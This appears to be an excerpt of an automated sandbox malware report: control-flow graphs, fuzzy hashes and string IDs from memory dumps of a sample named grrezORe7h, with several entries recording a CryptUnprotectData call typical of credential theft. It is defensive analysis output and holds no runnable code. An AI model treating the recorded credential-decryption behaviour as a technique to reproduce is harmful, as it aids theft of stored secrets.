                                                                                                                      control_flow_graph 0 377dd6c1-377dd6f8 2 377dd6fe-377dd712 0->2 3 377ddb29 0->3 4 377dd714-377dd73e 2->4 5 377dd741-377dd760 2->5 6 377ddb2e-377ddb44 3->6 4->5 12 377dd778-377dd77a 5->12 13 377dd762-377dd768 5->13 17 377dd77c-377dd794 12->17 18 377dd799-377dd7a2 12->18 15 377dd76c-377dd76e 13->15 16 377dd76a 13->16 15->12 16->12 17->6 19 377dd7aa-377dd7b1 18->19 20 377dd7bb-377dd7c2 19->20 21 377dd7b3-377dd7b9 19->21 23 377dd7cc 20->23 24 377dd7c4-377dd7ca 20->24 22 377dd7cf-377dd7ec call 377dc5c0 21->22 27 377dd941-377dd945 22->27 28 377dd7f2-377dd7f9 22->28 23->22 24->22 30 377dd94b-377dd94f 27->30 31 377ddb14-377ddb27 27->31 28->3 29 377dd7ff-377dd83c 28->29 39 377ddb0a-377ddb0e 29->39 40 377dd842-377dd847 29->40 32 377dd969-377dd972 30->32 33 377dd951-377dd964 30->33 31->6 34 377dd974-377dd99e 32->34 35 377dd9a1-377dd9a8 32->35 33->6 34->35 37 377dd9ae-377dd9b5 35->37 38 377dda47-377dda5c 35->38 42 377dd9e4-377dda06 37->42 43 377dd9b7-377dd9e1 37->43 38->39 52 377dda62-377dda64 38->52 39->19 39->31 44 377dd879-377dd88e call 377dc5e4 40->44 45 377dd849-377dd857 call 377dc5cc 40->45 42->38 81 377dda08-377dda12 42->81 43->42 50 377dd893-377dd897 44->50 45->44 59 377dd859-377dd877 call 377dc5d8 45->59 55 377dd899-377dd8ab call 377d0938 call 377dc5f0 50->55 56 377dd908-377dd915 50->56 57 377dda66-377dda9f 52->57 58 377ddab1-377ddace call 377dc5c0 52->58 84 377dd8ad-377dd8dd 55->84 85 377dd8eb-377dd903 55->85 56->39 72 377dd91b-377dd925 call 377dc600 56->72 75 377ddaa8-377ddaaf 57->75 76 377ddaa1-377ddaa7 57->76 58->39 71 377ddad0-377ddafc WaitMessage 58->71 59->50 78 377ddafe 71->78 79 377ddb03 71->79 87 377dd934-377dd93c call 377dc618 72->87 88 377dd927-377dd92a call 377dc60c 72->88 75->39 76->75 78->79 79->39 92 377dda2a-377dda45 81->92 93 377dda14-377dda1a 81->93 99 377dd8df 84->99 100 377dd8e4 84->100 85->6 87->39 95 377dd92f 88->95 92->38 92->81 97 377dda1c 93->97 98 377dda1e-377dda20 93->98 95->39 97->92 98->92 99->100 100->85
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $z~7$$z~7$$z~7$$z~7$<06
                                                                                                                      • API String ID: 0-181884487
                                                                                                                      • Opcode ID: f5abe977f59d581b98bd789ca2faee960ad2e0d9ac4c01d0b66f780aa6f217c0
                                                                                                                      • Instruction ID: 14127c403d11c3e5f208821c6ea9dcfb867871a65f70296bda4c31557c8d53ba
                                                                                                                      • Opcode Fuzzy Hash: f5abe977f59d581b98bd789ca2faee960ad2e0d9ac4c01d0b66f780aa6f217c0
                                                                                                                      • Instruction Fuzzy Hash: 6FD12B74A00305DFEB04DFA5C848BADBBF2BF85314F15855AE409BF2A5DB74A945CB80

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 341 155f90-155fc6 472 155fc8 call 155f90 341->472 473 155fc8 call 1560e0 341->473 342 155fce-155fd4 343 156024-156028 342->343 344 155fd6-155fda 342->344 347 15603f-156053 343->347 348 15602a-156039 343->348 345 155fdc-155fe1 344->345 346 155fe9-155ff0 344->346 345->346 349 1560c6-156103 346->349 350 155ff6-155ffd 346->350 470 156055 call 158da0 347->470 471 156055 call 1590a8 347->471 351 156065-15606f 348->351 352 15603b-15603d 348->352 362 156105-15610b 349->362 363 15610e-15612e 349->363 350->343 355 155fff-156003 350->355 353 156071-156077 351->353 354 156079-15607d 351->354 356 15605b-156062 352->356 358 156085-1560bf 353->358 354->358 359 15607f 354->359 360 156005-15600a 355->360 361 156012-156019 355->361 358->349 359->358 360->361 361->349 364 15601f-156022 361->364 362->363 369 156135-15613c 363->369 370 156130 363->370 364->356 373 15613e-156149 369->373 372 1564c4-1564cd 370->372 374 1564d5-156511 373->374 375 15614f-156162 373->375 384 156513-156518 374->384 385 15651a-15651e 374->385 380 156164-156172 375->380 381 156178-156193 375->381 380->381 387 15644c-156453 380->387 389 156195-15619b 381->389 390 1561b7-1561ba 381->390 388 156524-156525 384->388 385->388 387->372 393 156455-156457 387->393 391 1561a4-1561a7 389->391 392 15619d 389->392 394 156314-15631a 390->394 395 1561c0-1561c3 390->395 397 1561da-1561e0 391->397 398 1561a9-1561ac 391->398 392->391 392->394 396 156406-156409 392->396 392->397 399 156466-15646c 393->399 400 156459-15645e 393->400 394->396 401 156320-156325 394->401 395->394 402 1561c9-1561cf 395->402 407 1564d0 396->407 408 15640f-156415 396->408 409 1561e6-1561e8 397->409 410 1561e2-1561e4 397->410 403 156246-15624c 398->403 404 1561b2 398->404 399->374 405 15646e-156473 399->405 400->399 401->396 402->394 406 1561d5 402->406 403->396 413 156252-156258 403->413 404->396 411 156475-15647a 405->411 412 1564b8-1564bb 405->412 406->396 407->374 414 156417-15641f 408->414 415 15643a-15643e 408->415 416 1561f2-1561fb 409->416 410->416 411->407 422 15647c 411->422 412->407 421 1564bd-1564c2 412->421 423 15625e-156260 413->423 424 15625a-15625c 413->424 414->374 417 156425-156434 414->417 415->387 420 156440-156446 415->420 418 1561fd-156208 416->418 419 15620e-156236 416->419 417->381 417->415 418->396 418->419 444 15623c-156241 419->444 445 15632a-156360 419->445 420->373 420->387 421->372 421->393 426 156483-156488 422->426 425 15626a-156281 423->425 424->425 437 156283-15629c 425->437 438 1562ac-1562d3 425->438 430 1564aa-1564ac 426->430 431 15648a-15648c 426->431 430->407 435 1564ae-1564b1 430->435 432 15648e-156493 431->432 433 15649b-1564a1 431->433 432->433 433->374 436 1564a3-1564a8 433->436 435->412 436->430 440 15647e-156481 436->440 437->445 449 1562a2-1562a7 437->449 438->407 448 1562d9-1562dc 438->448 440->407 440->426 444->445 452 156362-156366 445->452 453 15636d-156375 445->453 448->407 451 1562e2-15630b 448->451 449->445 451->445 468 15630d-156312 451->468 455 156385-156389 452->455 456 156368-15636b 452->456 453->407 454 15637b-156380 453->454 454->396 458 1563a8-1563ac 455->458 459 15638b-156391 455->459 456->453 456->455 461 1563b6-1563d5 call 1566b8 458->461 462 1563ae-1563b4 458->462 459->458 460 156393-15639b 459->460 460->407 464 1563a1-1563a6 460->464 465 1563db-1563df 461->465 462->461 462->465 464->396 465->396 466 1563e1-1563fd 465->466 466->396 468->445 470->356 471->356 472->342 473->342
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (odq$(odq$(odq$,hq$,hq$dKY4pKY4KY4
                                                                                                                      • API String ID: 0-798548428
                                                                                                                      • Opcode ID: 14990d93c2fbc1e6b4a9faa39d05ae4d3a55a3c862a5b5cb6352f354ff0b9e16
                                                                                                                      • Instruction ID: f17bc1c7c10955147f39544b733ef583fd8d3bcf17e57ca09706a25cc36f3326
                                                                                                                      • Opcode Fuzzy Hash: 14990d93c2fbc1e6b4a9faa39d05ae4d3a55a3c862a5b5cb6352f354ff0b9e16
                                                                                                                      • Instruction Fuzzy Hash: C5124130A00219DFCB14CF69C994AAEBBF2FF99316F958059E8159F261DB30DD85CB90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (odq$4'dq$4'dq$4'dq$pKY4KY4
                                                                                                                      • API String ID: 0-4235713360
                                                                                                                      • Opcode ID: c6fc89969412a4c96e27a2d50df9b424ae1bc6bfd4197f3ea8528892f05b4ea9
                                                                                                                      • Instruction ID: eb41e2ce9949e8b034ae201831331f595d043d271738934cbd220b494c193a5c
                                                                                                                      • Opcode Fuzzy Hash: c6fc89969412a4c96e27a2d50df9b424ae1bc6bfd4197f3ea8528892f05b4ea9
                                                                                                                      • Instruction Fuzzy Hash: CAA26E70A04219DFCB15CF68C994AAEBBF2BF88301F158559E815DF2A1D730ED85CBA1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 891 154328-154368 893 15436f-15444c call 153168 call 152c88 891->893 894 15436a 891->894 904 154453-154471 893->904 905 15444e 893->905 894->893 935 154474 call 154664 904->935 936 154474 call 154620 904->936 905->904 906 15447a-154485 907 154487 906->907 908 15448c-154490 906->908 907->908 909 154495-15449c 908->909 910 154492-154493 908->910 912 1544a3-1544b1 909->912 913 15449e 909->913 911 1544b4-1544f8 910->911 917 15455e-154575 911->917 912->911 913->912 919 154577-15459c 917->919 920 1544fa-154510 917->920 926 1545b4 919->926 927 15459e-1545b3 919->927 924 154512-15451e 920->924 925 15453a 920->925 928 154520-154526 924->928 929 154528-15452e 924->929 930 154540-15455d 925->930 927->926 931 154538 928->931 929->931 930->917 931->930 935->906 936->906
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0oGp$LjGp$LjGp$PHdq$PHdq
                                                                                                                      • API String ID: 0-1273542581
                                                                                                                      • Opcode ID: 5dc54349e1bbbb82a27392d6e47cc518c1d0ea8de78ce57c1ab5aac245a10481
                                                                                                                      • Instruction ID: fa1c8db990449e71e943d044591d2dd33cb74943f8c1180ece9dcacefae0522e
                                                                                                                      • Opcode Fuzzy Hash: 5dc54349e1bbbb82a27392d6e47cc518c1d0ea8de78ce57c1ab5aac245a10481
                                                                                                                      • Instruction Fuzzy Hash: 4591E774E00218DFDB14CFA9D884A9DBBF2BF89305F14D06AE819AB365DB349985CF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: fdbbdfa900acdb892edd6d4d64ed6d30f563e92b814146d10f582e64d9584a58
                                                                                                                      • Instruction ID: ec4800ec6d4f1dcb3780f304b5b345552f8008bb7e5c9e2ef59f7c435e8710bc
                                                                                                                      • Opcode Fuzzy Hash: fdbbdfa900acdb892edd6d4d64ed6d30f563e92b814146d10f582e64d9584a58
                                                                                                                      • Instruction Fuzzy Hash: 1E82C574A10268CFDB65DF64C954BADB7B2FB89301F1091EAE90967350CB35AE81DF40
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: 34d0dbbaba3d2500d22a393f694d61f8dfb87cba8f34b0df99db502ce3b389e7
                                                                                                                      • Instruction ID: 474fc11d77876bd22e3a429c8297f37773a0990b24ec96f900ec058f6aa7e500
                                                                                                                      • Opcode Fuzzy Hash: 34d0dbbaba3d2500d22a393f694d61f8dfb87cba8f34b0df99db502ce3b389e7
                                                                                                                      • Instruction Fuzzy Hash: 9A72C474A10268CFDB65DF64C954BADB7B2FB89301F1090EAE90967360CB35AE81DF50
                                                                                                                      APIs
                                                                                                                      • CryptUnprotectData.CRYPT32(00000039,?,00000000,?,?,?,?), ref: 36ECDA45
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 834300711-0
                                                                                                                      • Opcode ID: 0a10ad1a6739e58f0e415b86e952178d8d61d16483922d7245b11c2b29f51fb4
                                                                                                                      • Instruction ID: 41ce53ed6a6a44c41fe6e40ecae65de43c4db9739315e45eb0c0d03a33772b23
                                                                                                                      • Opcode Fuzzy Hash: 0a10ad1a6739e58f0e415b86e952178d8d61d16483922d7245b11c2b29f51fb4
                                                                                                                      • Instruction Fuzzy Hash: FC1167B68003499FCB10CF99C905BDEBFF5EF48320F148419E658A7211C739A554DFA5
                                                                                                                      APIs
                                                                                                                      • CryptUnprotectData.CRYPT32(00000039,?,00000000,?,?,?,?), ref: 36ECDA45
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 834300711-0
                                                                                                                      • Opcode ID: 5a942aa1d62fb3fca38941458b984cf45a0c040891040083f944c1a28cd10b74
                                                                                                                      • Instruction ID: cd638388134efd8c8873fe2d1ad90febae57fcc9dbcf5e966599ddb502f7debc
                                                                                                                      • Opcode Fuzzy Hash: 5a942aa1d62fb3fca38941458b984cf45a0c040891040083f944c1a28cd10b74
                                                                                                                      • Instruction Fuzzy Hash: 001159B68003499FDB10CF99C905BEEBFF4EB48320F108419E658A7211C735A954DFA5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6
                                                                                                                      • API String ID: 0-3617711204
                                                                                                                      • Opcode ID: 05c7a396b5ddd75a31da297e305d1bc02b20ab1e634879fbaf299c6d9c54fceb
                                                                                                                      • Instruction ID: f6413d518e68fb5c12795517caa3161046abb4b7d26edb65b15fc270670221f6
                                                                                                                      • Opcode Fuzzy Hash: 05c7a396b5ddd75a31da297e305d1bc02b20ab1e634879fbaf299c6d9c54fceb
                                                                                                                      • Instruction Fuzzy Hash: 66A10474D01208CFDB10DFA9C954BDDBBB1BF88315F208269E408AB391DB759989CF55
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0^07
                                                                                                                      • API String ID: 0-3501635579
                                                                                                                      • Opcode ID: 2271c38fa1094525adb57b338a82ed8f8d7ee4a7ea9c67e54b64688c63fadec5
                                                                                                                      • Instruction ID: adc219e6c966d9b88f00cf71c2522d5efb0a8b02baad811960a7c4cc7ce1ccb9
                                                                                                                      • Opcode Fuzzy Hash: 2271c38fa1094525adb57b338a82ed8f8d7ee4a7ea9c67e54b64688c63fadec5
                                                                                                                      • Instruction Fuzzy Hash: 3BA1A1B5E012188FEB54CF6AC945B9EBBF2AF89300F14C0AAD40DB7251DB349A85CF51
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0^07
                                                                                                                      • API String ID: 0-3501635579
                                                                                                                      • Opcode ID: 6a95a1da22367fa62f9470fe6c6829368217fb417d508b7e46137cdf78bc7425
                                                                                                                      • Instruction ID: f3ef921763154f587372818b905c78aaf46b3ad4c4aa3b700d1c51ba9bdf3db1
                                                                                                                      • Opcode Fuzzy Hash: 6a95a1da22367fa62f9470fe6c6829368217fb417d508b7e46137cdf78bc7425
                                                                                                                      • Instruction Fuzzy Hash: A9A1A0B5E012288FEB54CF6AC985B9DBBF2AF89300F10C0AAD40DA7255DB345A85CF51
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0^07
                                                                                                                      • API String ID: 0-3501635579
                                                                                                                      • Opcode ID: cd4ddeb92470c81592e1d02663f554e956330c24f31785ba4d1b4ddc9862e5f2
                                                                                                                      • Instruction ID: aed515c7e5f9617e685519d00aef51a2290f272b5530904f774c49236e921c9a
                                                                                                                      • Opcode Fuzzy Hash: cd4ddeb92470c81592e1d02663f554e956330c24f31785ba4d1b4ddc9862e5f2
                                                                                                                      • Instruction Fuzzy Hash: 8BA190B4E012188FEB58CF6AC945B9DBBF2AF89300F14D1AAD40DB7255DB349A85CF11
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0^07
                                                                                                                      • API String ID: 0-3501635579
                                                                                                                      • Opcode ID: 22ae40dd9c0b222fdf74016ec4b2760e0ec8b39db137628143ff9812c21bbba7
                                                                                                                      • Instruction ID: ac1dea7affc0810692ceb911fc2fa1fa755b1ae6341d35d76a1291b88c7ab51c
                                                                                                                      • Opcode Fuzzy Hash: 22ae40dd9c0b222fdf74016ec4b2760e0ec8b39db137628143ff9812c21bbba7
                                                                                                                      • Instruction Fuzzy Hash: CDA1B2B5E012188FEB54CF6AC984B9DBBF2AF89300F10C1AAD40DB7255DB345A85CF11
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6
                                                                                                                      • API String ID: 0-3617711204
                                                                                                                      • Opcode ID: d2e972211bb4e830c1f706f350ecdfc0144c9a16b7da9a52944cb80829b1c0a3
                                                                                                                      • Instruction ID: fb042bc4e52211ea7e55ef6e99ddb49ed3d6ac6ea552906cae82ebd584ce7301
                                                                                                                      • Opcode Fuzzy Hash: d2e972211bb4e830c1f706f350ecdfc0144c9a16b7da9a52944cb80829b1c0a3
                                                                                                                      • Instruction Fuzzy Hash: EA91F374D01218CFEB10DFA9C584BDDBBB1FF88305F209269E408AB291DB759989CF55
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6
                                                                                                                      • API String ID: 0-3617711204
                                                                                                                      • Opcode ID: 7f317fee19f5d2799aa95b14f3c094ae7d7edd4b660001d042a39851b4ee297d
                                                                                                                      • Instruction ID: 2b67fbb982b54127f6c63bc1b2383dad63bcd2f0d310429275d19b6ca2d7ede8
                                                                                                                      • Opcode Fuzzy Hash: 7f317fee19f5d2799aa95b14f3c094ae7d7edd4b660001d042a39851b4ee297d
                                                                                                                      • Instruction Fuzzy Hash: 5F910374D00208CFEB10DFA8C984BDDBBB1FF88305F209269E408AB291DB759989CF55
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6
                                                                                                                      • API String ID: 0-3617711204
                                                                                                                      • Opcode ID: e880228a5599b97d7d5bfaa26d1e49a69b92e40143cb4d29bb0735a2f78bb986
                                                                                                                      • Instruction ID: 1121a06ccd5c9aaa39c4f7204cd7df150dbe421e45be85eb27943538dabc10e6
                                                                                                                      • Opcode Fuzzy Hash: e880228a5599b97d7d5bfaa26d1e49a69b92e40143cb4d29bb0735a2f78bb986
                                                                                                                      • Instruction Fuzzy Hash: 1C91E374D01208CFEB10DFA9C594B9DBBB1FF88305F209269E409AB291DB759985CF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 438dfae2df85a752694a70087b372cdada8abc5d1a9558e56969c2b67d4af444
                                                                                                                      • Instruction ID: 765173f4dbafd5d24f8cda8a5ae9bc0d9930a9dcfd6072a4b877187e7f5206e7
                                                                                                                      • Opcode Fuzzy Hash: 438dfae2df85a752694a70087b372cdada8abc5d1a9558e56969c2b67d4af444
                                                                                                                      • Instruction Fuzzy Hash: E372ACB4E012298FDB65DF69C991BD9BBB2FB49300F1091EAD40CA7251DB34AE81CF40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2119d1b45b2ad8b524d2a845fe325aa9f3a8e3357ed9323c6157ce92336ba795
                                                                                                                      • Instruction ID: a09e801ca39cb9fc28abf1d1e1fcbcbda49b6ec58a8298b958beca099674e9ca
                                                                                                                      • Opcode Fuzzy Hash: 2119d1b45b2ad8b524d2a845fe325aa9f3a8e3357ed9323c6157ce92336ba795
                                                                                                                      • Instruction Fuzzy Hash: E8E1C274E01268CFDB14CFA8C954B9DBBB2BF89305F2081AAD409BB391DB355A85CF51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2c426d42205feea0c728f74883b7ba13e266da6b8ec3a0696e27b5a74ef9d103
                                                                                                                      • Instruction ID: 77de394fba486e3818052c8701f867869e02d83678f26783d91aa6730c1c8dc5
                                                                                                                      • Opcode Fuzzy Hash: 2c426d42205feea0c728f74883b7ba13e266da6b8ec3a0696e27b5a74ef9d103
                                                                                                                      • Instruction Fuzzy Hash: 26C1C174E01218CFDB14DFA9C994B9DBBB2BF88301F1090AAE809AB355DB355E85DF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 16badb78442d0accc66d3fd03660e08333a9eb9cb38cdc8cbb14faa57a26b6f2
                                                                                                                      • Instruction ID: 54a15bf50e40e8cb8f45dfb39e1d9bed6d59f572672978dd82f73891ffb0e78d
                                                                                                                      • Opcode Fuzzy Hash: 16badb78442d0accc66d3fd03660e08333a9eb9cb38cdc8cbb14faa57a26b6f2
                                                                                                                      • Instruction Fuzzy Hash: 3F91F174D00218CFEB10DFA8C988BDCBBB1FF49315F209269E409AB291DB759989CF55
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 41bec61f51809d668d0112bec8aeae1dd016544706d7e545688ae02c1362139c
                                                                                                                      • Instruction ID: 2e90f2b2e064680eb3931557f22fe77e8eccd6b5d718c3b495648dabf83c716c
                                                                                                                      • Opcode Fuzzy Hash: 41bec61f51809d668d0112bec8aeae1dd016544706d7e545688ae02c1362139c
                                                                                                                      • Instruction Fuzzy Hash: 2781F574E01248CBDB44DFAAD95169DBBF2FF88310F24D529E418AB358DB35A942CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 82a96174e6d1cb9581363e564f65613528f5bc89e2ec15a7794d4406b412dd7c
                                                                                                                      • Instruction ID: 99465759c12fc5d25bf7b7666f8de3b39b0fbd8d6d2a497a9e1f5b9266a4340c
                                                                                                                      • Opcode Fuzzy Hash: 82a96174e6d1cb9581363e564f65613528f5bc89e2ec15a7794d4406b412dd7c
                                                                                                                      • Instruction Fuzzy Hash: B871A475D01268CFDB65CF6AC9807DDBBB2BF89301F1091AAD408A7264DB356A86CF40

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
